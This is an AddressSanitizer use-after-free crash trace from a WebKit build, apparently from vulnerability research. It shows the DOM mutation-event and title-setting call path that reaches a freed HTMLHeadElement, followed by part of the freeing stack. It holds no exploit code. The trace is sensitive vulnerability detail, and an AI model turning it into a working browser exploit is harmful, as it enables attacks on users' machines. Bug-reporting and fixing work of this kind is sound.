==69151==WARNING: invalid path to external symbolizer!
==69151==WARNING: Failed to use and restart external symbolizer!
    #0 0x114650619 in WebCore::Node::getFlag(WebCore::Node::NodeFlags) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb8619)
    #1 0x116998b2d in WebCore::Node::ensureRareData() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2400b2d)
    #2 0x116a8e148 in WebCore::Element::ensureElementRareData() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24f6148)
    #3 0x116aa5e5a in WebCore::Element::resolveComputedStyle() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x250de5a)
    #4 0x116aa66d8 in WebCore::Element::computedStyle(WebCore::PseudoId) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x250e6d8)
    #5 0x116f59ee9 in WebCore::HTMLTitleElement::computedTextWithDirection() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x29c1ee9)
    #6 0x116f59db1 in WebCore::HTMLTitleElement::childrenChanged(WebCore::ContainerNode::ChildChange const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x29c1db1)
    #7 0x116993126 in WebCore::ContainerNode::appendChildWithoutPreInsertionValidityCheck(WebCore::Node&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23fb126)
    #8 0x116996e05 in WebCore::ContainerNode::replaceAllChildren(WTF::Ref<WebCore::Node, WTF::DumbPtrTraits<WebCore::Node> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23fee05)
    #9 0x116b2e058 in WebCore::Node::setTextContent(WTF::String const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2596058)
    #10 0x1169e6fb9 in WebCore::Document::setTitle(WTF::String const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x244efb9)
    #11 0x114dd2ef8 in WebCore::setJSDocumentTitleSetter(JSC::ExecState&, WebCore::JSDocument&, JSC::JSValue, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x83aef8)
    #12 0x114da64b6 in bool WebCore::IDLAttribute<WebCore::JSDocument>::set<&(WebCore::setJSDocumentTitleSetter(JSC::ExecState&, WebCore::JSDocument&, JSC::JSValue, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, long long, long long, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x80e4b6)
    #13 0x126386f98 in JSC::callCustomSetter(JSC::ExecState*, bool (*)(JSC::ExecState*, long long, long long), bool, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x2498f98)
    #14 0x1263870d1 in JSC::callCustomSetter(JSC::ExecState*, JSC::JSValue, bool, JSC::JSObject*, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x24990d1)
    #15 0x12652e732 in JSC::JSObject::putInlineSlow(JSC::ExecState*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x2640732)
    #16 0x1260256d9 in llint_slow_path_put_by_id (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x21376d9)
    #17 0x123ffc67b in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x10e67b)
    #18 0x123ff933a in vmEntryToJavaScript (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x10b33a)
    #19 0x125d68964 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1e7a964)
    #20 0x12633a5b9 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244c5b9)
    #21 0x12633a74b in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244c74b)
    #22 0x12633aaf1 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244caf1)
    #23 0x1164446b8 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1eac6b8)
    #24 0x116492b9c in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1efab9c)
    #25 0x116ad19ee in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener, WTF::DumbPtrTraits<WebCore::RegisteredEventListener> >, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25399ee)
    #26 0x116accfbe in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2534fbe)
    #27 0x116ab0590 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2518590)
    #28 0x116ac465b in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x252c65b)
    #29 0x116ac405e in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x252c05e)
    #30 0x116ac3aed in WebCore::EventDispatcher::dispatchScopedEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x252baed)
    #31 0x1169a43c9 in WebCore::dispatchChildRemovalEvents(WTF::Ref<WebCore::Node, WTF::DumbPtrTraits<WebCore::Node> >&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x240c3c9)
    #32 0x116995156 in WebCore::ContainerNode::removeChild(WebCore::Node&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23fd156)
    #33 0x116994703 in WebCore::ContainerNode::replaceChild(WebCore::Node&, WebCore::Node&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23fc703)
    #34 0x116b2896b in WebCore::Node::replaceWith(WTF::Vector<WTF::Variant<WTF::RefPtr<WebCore::Node, WTF::DumbPtrTraits<WebCore::Node> >, WTF::String>, 0ul, WTF::CrashOnOverflow, 16ul>&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x259096b)
    #35 0x114e540ba in WebCore::jsElementPrototypeFunctionReplaceWithBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8bc0ba)
    #36 0x114e35a87 in long long WebCore::IDLOperation<WebCore::JSElement>::call<&(WebCore::jsElementPrototypeFunctionReplaceWithBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x89da87)
    #37 0x17ac3cce176  (<unknown module>)
    #38 0x123fffd08 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x111d08)
    #39 0x123ff933a in vmEntryToJavaScript (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x10b33a)
    #40 0x125d68964 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1e7a964)
    #41 0x12633a5b9 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244c5b9)
    #42 0x12633a74b in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244c74b)
    #43 0x12633aaf1 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244caf1)
    #44 0x1164446b8 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1eac6b8)
    #45 0x116492b9c in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1efab9c)
    #46 0x116ad19ee in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener, WTF::DumbPtrTraits<WebCore::RegisteredEventListener> >, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25399ee)
    #47 0x116accfbe in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2534fbe)
    #48 0x116ab0590 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2518590)
    #49 0x116ac465b in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x252c65b)
    #50 0x116ac405e in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x252c05e)
    #51 0x116ac3aed in WebCore::EventDispatcher::dispatchScopedEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x252baed)
    #52 0x116b336fd in WebCore::Node::dispatchSubtreeModifiedEvent() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x259b6fd)
    #53 0x116aa08b5 in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25088b5)
    #54 0x116a98e58 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2500e58)
    #55 0x116a98c15 in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2500c15)
    #56 0x114e49c37 in WebCore::jsElementPrototypeFunctionSetAttributeBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8b1c37)
    #57 0x114e30ba7 in long long WebCore::IDLOperation<WebCore::JSElement>::call<&(WebCore::jsElementPrototypeFunctionSetAttributeBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x898ba7)
    #58 0x17ac3cce176  (<unknown module>)
    #59 0x123fffd08 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x111d08)
    #60 0x123fffd08 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x111d08)
    #61 0x123ff933a in vmEntryToJavaScript (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x10b33a)
    #62 0x125d68964 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1e7a964)
    #63 0x12633a5b9 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244c5b9)
    #64 0x12633a74b in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244c74b)
    #65 0x12633aaf1 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244caf1)
    #66 0x1164446b8 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1eac6b8)
    #67 0x116492b9c in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1efab9c)
    #68 0x116ad19ee in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener, WTF::DumbPtrTraits<WebCore::RegisteredEventListener> >, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25399ee)
    #69 0x116accfbe in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2534fbe)
    #70 0x1174585a5 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ec05a5)
    #71 0x117468e04 in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ed0e04)
    #72 0x1169f165f in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x245965f)
    #73 0x1169ea580 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2452580)
    #74 0x1172e2367 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d4a367)
    #75 0x1173e069d in WebCore::CachedResourceLoader::loadDone(WebCore::LoadCompletionType, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e4869d)
    #76 0x117369391 in WebCore::SubresourceLoader::notifyDone(WebCore::LoadCompletionType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dd1391)
    #77 0x1173661c8 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dce1c8)
    #78 0x10f06687b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdfc87b)
    #79 0x10f06ae06 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe00e06)
    #80 0x10f06a0fe in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe000fe)
    #81 0x10e64bea8 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3e1ea8)
    #82 0x10e3beb7e in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x154b7e)
    #83 0x10e3c001e in IPC::Connection::dispatchIncomingMessages() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x15601e)
    #84 0x123f7d3c7 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8f3c7)
    #85 0x123f7de46 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8fe46)
    #86 0x7fff54e22a60 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa3a60)
    #87 0x7fff54edc47b in __CFRunLoopDoSource0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x15d47b)
    #88 0x7fff54e054bf in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x864bf)
    #89 0x7fff54e0493c in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8593c)
    #90 0x7fff54e041a2 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x851a2)
    #91 0x7fff540ead95 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fd95)
    #92 0x7fff540eab05 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb05)
    #93 0x7fff540ea883 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f883)
    #94 0x7fff5239ca72 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41a72)
    #95 0x7fff52b32e33 in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7e33)
    #96 0x7fff52391884 in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36884)
    #97 0x7fff52360a71 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5a71)
    #98 0x7fff7cf6cdc6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x10dc6)
    #99 0x7fff7cf6ba19 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xfa19)
    #100 0x10e2604c6 in main (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x1000014c6)
    #101 0x7fff7cc12014 in start (/usr/lib/system/libdyld.dylib:x86_64+0x1014)

0x60800006aa34 is located 20 bytes inside of 96-byte region [0x60800006aa20,0x60800006aa80)
freed by thread T0 here:
    #0 0x11240dfa4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59fa4)
    #1 0x123ff08e1 in bmalloc::IsoTLS::debugFree(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1028e1)
    #2 0x116e58c6b in void bmalloc::IsoTLS::deallocateSlow<bmalloc::IsoConfig<96u>, WebCore::HTMLHeadElement>(bmalloc::api::IsoHeap<WebCore::HTMLHeadElement>&, void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28c0c6b)
    #3 0x1264c15a5 in void JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::JSDestructibleObjectDestroyFunc const&)::'lambda'(void*)::operator()(void*) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x25d35a5)
    #4 0x1264c165a in void JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::JSDestructibleObjectDestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x25d365a)
    #5 0x1264bec8b in void JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::JSDestructibleObjectDestroyFunc const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x25d0c8b)
    #6 0x1264b858a in void JSC::MarkedBlock::Handle::finishSweepKnowingHeapCellType<JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::JSDestructibleObjectDestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x25ca58a)
    #7 0x12646e12e in void JSC::MarkedBlock::Handle::finishSweepKnowingHeapCellType<JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::JSDestructibleObjectDestroyFunc const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x258012e)
    #8 0x12646dd37 in JSC::JSDestructibleObjectHeapCellType::finishSweep(JSC::MarkedBlock::Handle&, JSC::FreeList*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x257fd37)
    #9 0x125bd9df9 in JSC::MarkedBlock::Handle::sweep(JSC::FreeList*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cebdf9)
    #10 0x125bcfada in JSC::LocalAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1ce1ada)
